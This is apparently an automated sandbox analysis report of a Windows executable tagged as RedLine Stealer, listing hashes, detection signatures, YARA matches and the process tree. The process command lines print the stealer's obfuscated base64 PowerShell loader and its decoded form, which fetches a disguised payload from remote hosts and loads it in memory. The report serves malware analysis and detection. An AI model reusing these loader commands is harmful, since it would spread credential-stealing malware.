
Windows Analysis Report
00wVZ1NU5b.exe

Overview

General Information

Sample name: 00wVZ1NU5b.exe
renamed because original name is a hash value
Original sample name: a11a8da90ad22616ca604476cb9f2749.exe
Analysis ID: 1604514
MD5: a11a8da90ad22616ca604476cb9f2749
SHA1: a877ecdacdda321bfd73ecd8b18584725fd11cbb
SHA256: e52a775c02065896cacd99b1f7141c40aea77edc9fdbbfa69b900ce1c050d62c
Tags: exe, RedLineStealer, user-abuse_ch

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and load assembly
Yara detected Powershell download and execute
Found suspicious powershell code related to unpacking or dynamic code loading
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Binary contains a suspicious time stamp
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain checking for process token information
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • 00wVZ1NU5b.exe (PID: 6764 cmdline: "C:\Users\user\Desktop\00wVZ1NU5b.exe" MD5: A11A8DA90AD22616CA604476CB9F2749)
    • cmd.exe (PID: 4340 cmdline: cmd /c lol.vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wscript.exe (PID: 2328 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\lol.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
        • powershell.exe (PID: 5936 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZgBn@Gg@Z@@v@GY@ZwBk@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@C4@agBw@Gc@Pw@x@DM@Nw@x@DE@Mw@n@Cw@I@@n@Gg@d@@z@DU@LwBu@GE@bgBv@C8@cgBl@GY@cw@v@Gg@ZQBh@GQ@cw@v@G0@YQBp@G4@LwBu@GU@dwBf@Gk@bQBn@DE@Mg@z@C4@agBw@Gc@Jw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@C@@PQ@g@EQ@bwB3@G4@b@Bv@GE@Z@BE@GE@d@Bh@EY@cgBv@G0@T@Bp@G4@awBz@C@@J@Bs@Gk@bgBr@HM@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@Bp@GY@I@@o@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@C0@bgBl@C@@J@Bu@HU@b@Bs@Ck@I@B7@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@g@D0@I@Bb@FM@eQBz@HQ@ZQBt@C4@V@Bl@Hg@d@@u@EU@bgBj@G8@Z@B
p@G4@ZwBd@Do@OgBV@FQ@Rg@4@C4@RwBl@HQ@UwB0@HI@aQBu@Gc@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBT@FQ@QQBS@FQ@Pg@+@Cc@Ow@g@CQ@ZQBu@GQ@RgBs@GE@Zw@g@D0@I@@n@Dw@P@BC@EE@UwBF@DY@N@Bf@EU@TgBE@D4@Pg@n@Ds@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@Ck@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@t@Gc@ZQ@g@D@@I@@t@GE@bgBk@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@Gc@d@@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@p@C@@ew@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@Cs@PQ@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@LgBM@GU@bgBn@HQ@a@@7@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YgBh@HM@ZQ@2@DQ@T@Bl@G4@ZwB0@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BD@G8@bQBt@GE@bgBk@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBT@HU@YgBz@HQ@cgBp@G4@Zw@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@s@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@RQBu@GM@bwBk@GU@Z@BU@GU@e@B0@C@@PQBb@EM@bwBu@HY@ZQBy@HQ@XQ@6@Do@V@Bv@EI@YQBz@GU@Ng@0@FM@d@By@Gk@bgBn@Cg@J@BC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YwBv@G0@bQBh@G4@Z@BC@Hk@d@Bl@HM@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@EM@bwBu@HY@ZQBy@HQ@XQ@6@Do@RgBy@G8@bQBC@GE@cwBl@DY@N@BT@HQ@cgBp@G4@Zw@o@CQ@YgBh@HM@ZQ@2@DQ@QwBv@G0@bQBh@G4@Z@@p@Ds@I@@g@C@@J@B0@GU@e@B0@C@@PQ@g@CQ@RQBu@GM@bwBk@GU@Z@BU@GU@e@B0@Ds@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@g@D0@I@Bb@FM@eQBz@HQ@ZQBt@C4@UgBl@GY@b@Bl@GM@d@Bp@G8@bg@u@EE@cwBz@GU@bQBi@Gw@eQBd@Do@OgBM@G8@YQBk@Cg@J@Bj@G8@bQBt@GE@bgBk@EI@eQB0@GU@cw@p@Ds@I@@g@CQ@RQBu@GM@bwBk@GU@Z@BU@GU@e@B0@C@@PQBb@EM@bwBu@HY@ZQBy@HQ@XQ@6@Do@V@Bv@EI@YQBz@GU@Ng@0@FM@d@By@Gk@bgBn@Cg@J@BC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@
g@C@@I@@k@GM@bwBt@H@@cgBl@HM@cwBl@GQ@QgB5@HQ@ZQBB@HI@cgBh@Hk@I@@9@C@@RwBl@HQ@LQBD@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@LQBi@Hk@d@Bl@EE@cgBy@GE@eQ@g@CQ@ZQBu@GM@V@Bl@Hg@d@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B0@Hk@c@Bl@C@@PQ@g@CQ@b@Bv@GE@Z@Bl@GQ@QQBz@HM@ZQBt@GI@b@B5@C4@RwBl@HQ@V@B5@H@@ZQ@o@Cc@d@Bl@HM@d@Bw@G8@dwBl@HI@cwBo@GU@b@Bs@C4@S@Bv@GE@YQBh@GE@YQBh@HM@Z@Bt@GU@Jw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@BF@G4@YwBv@GQ@ZQBk@FQ@ZQB4@HQ@I@@9@Fs@QwBv@G4@dgBl@HI@d@Bd@Do@OgBU@G8@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@EI@eQB0@GU@cw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bt@GU@d@Bo@G8@Z@@g@D0@I@@k@HQ@eQBw@GU@LgBH@GU@d@BN@GU@d@Bo@G8@Z@@o@Cc@b@Bm@HM@ZwBl@GQ@Z@Bk@GQ@Z@Bk@GQ@YQ@n@Ck@LgBJ@G4@dgBv@Gs@ZQ@o@CQ@bgB1@Gw@b@@s@C@@WwBv@GI@agBl@GM@d@Bb@F0@XQ@g@Cg@JwB0@Hg@d@@u@Gk@a@Bi@GQ@Z@Bp@Ek@LwBz@GU@b@Bp@GY@LwBn@HI@bw@u@G0@YQBr@HU@cgBl@HM@YQBk@HM@ZQBo@HQ@ZQBi@C8@Lw@6@HM@Jw@s@C@@Jw@w@Cc@L@@g@Cc@UwB0@GE@cgB0@HU@c@BO@GE@bQBl@Cc@L@@g@Cc@UgBl@Gc@QQBz@G0@Jw@s@C@@Jw@w@Cc@KQ@p@H0@fQ@=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 3392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 6568 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfghd/fgd/downloads/test.jpg?137113', 'ht35/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.ihbddiI/selif/gro.makuresadsehteb//:s', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
Process Memory Space: powershell.exe PID: 5936 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: powershell.exe PID: 5936 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | Strings:
    • 0x3c3c1:$b2: ::FromBase64String(
    • 0x7f82c:$b2: ::FromBase64String(
    • 0xf39af:$b2: ::FromBase64String(
    • 0x3c194:$b3: ::UTF8.GetString(
    • 0x7f5ff:$b3: ::UTF8.GetString(
    • 0xf3781:$b3: ::UTF8.GetString(
    • 0x1488d9:$s1: -join
    • 0x151e21:$s1: -join
    • 0x198ff:$s3: reverse
    • 0x20554:$s3: reverse
    • 0x2253b:$s3: reverse
    • 0x2d56a:$s3: reverse
    • 0x62a04:$s3: reverse
    • 0x6e242:$s3: reverse
    • 0xb16c1:$s3: reverse
    • 0xb8854:$s3: reverse
    • 0xf4cf1:$s3: reverse
    • 0xf4fdf:$s3: reverse
    • 0xf56f9:$s3: reverse
    • 0xf5eb2:$s3: reverse
    • 0xfcf9d:$s3: reverse
Process Memory Space: powershell.exe PID: 6568 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: powershell.exe PID: 6568 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | Strings:
      • 0x102e1:$b2: ::FromBase64String(
      • 0x4a9ce:$b2: ::FromBase64String(
      • 0x7883e:$b2: ::FromBase64String(
      • 0xa9908:$b2: ::FromBase64String(
      • 0x153d50:$b2: ::FromBase64String(
      • 0x15487f:$b2: ::FromBase64String(
      • 0x224a43:$b2: ::FromBase64String(
      • 0x2e4aab:$b2: ::FromBase64String(
      • 0x100b4:$b3: ::UTF8.GetString(
      • 0x4a7a1:$b3: ::UTF8.GetString(
      • 0x78611:$b3: ::UTF8.GetString(
      • 0xa96db:$b3: ::UTF8.GetString(
      • 0x153b23:$b3: ::UTF8.GetString(
      • 0x154652:$b3: ::UTF8.GetString(
      • 0x224816:$b3: ::UTF8.GetString(
      • 0x2e487e:$b3: ::UTF8.GetString(
      • 0xfaa8c:$s1: -join
      • 0x17f7c1:$s1: -join
      • 0x18c896:$s1: -join
      • 0x18fc68:$s1: -join
      • 0x19031a:$s1: -join
Source | Rule | Description | Author | Strings
amsi64_6568.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security

        System Summary

        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZgBn@Gg@Z@@v@GY@ZwBk@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@C4@agBw@Gc@Pw@x@DM@Nw@x@DE@Mw@n@Cw@I@@n@Gg@d@@z@DU@LwBu@GE@bgBv@C8@cgBl@GY@cw@v@Gg@ZQBh@GQ@cw@v@G0@YQBp@G4@LwBu@GU@dwBf@Gk@bQBn@DE@Mg@z@C4@agBw@Gc@Jw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@C@@PQ@g@EQ@bwB3@G4@b@Bv@GE@Z@BE@GE@d@Bh@EY@cgBv@G0@T@Bp@G4@awBz@C@@J@Bs@Gk@bgBr@HM@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@Bp@GY@I@@o@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@C0@bgBl@C@@J@Bu@HU@b@Bs@Ck@I@B7@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@g@D0@I@Bb@FM@eQ
Bz@HQ@ZQBt@C4@V@Bl@Hg@d@@u@EU@bgBj@G8@Z@Bp@G4@ZwBd@Do@OgBV@FQ@Rg@4@C4@RwBl@HQ@UwB0@HI@aQBu@Gc@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBT@FQ@QQBS@FQ@Pg@+@Cc@Ow@g@CQ@ZQBu@GQ@RgBs@GE@Zw@g@D0@I@@n@Dw@P@BC@EE@UwBF@DY@N@Bf@EU@TgBE@D4@Pg@n@Ds@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@Ck@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@t@Gc@ZQ@g@D@@I@@t@GE@bgBk@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@Gc@d@@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@p@C@@ew@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@Cs@PQ@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@LgBM@GU@bgBn@HQ@a@@7@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YgBh@HM@ZQ@2@DQ@T@Bl@G4@ZwB0@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZgBn@Gg@Z@@v@GY@ZwBk@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@C4@agBw@Gc@Pw@x@DM@Nw@x@DE@Mw@n@Cw@I@@n@Gg@d@@z@DU@LwBu@GE@bgBv@C8@cgBl@GY@cw@v@Gg@ZQBh@GQ@cw@v@G0@YQBp@G4@LwBu@GU@dwBf@Gk@bQBn@DE@Mg@z@C4@agBw@Gc@Jw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@C@@PQ@g@EQ@bwB3@G4@b@Bv@GE@Z@BE@GE@d@Bh@EY@cgBv@G0@T@Bp@G4@awBz@C@@J@Bs@Gk@bgBr@HM@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@Bp@GY@I@@o@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@C0@bgBl@C@@J@Bu@HU@b@Bs@Ck@I@B7@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@g@D0@I@Bb@FM@eQ
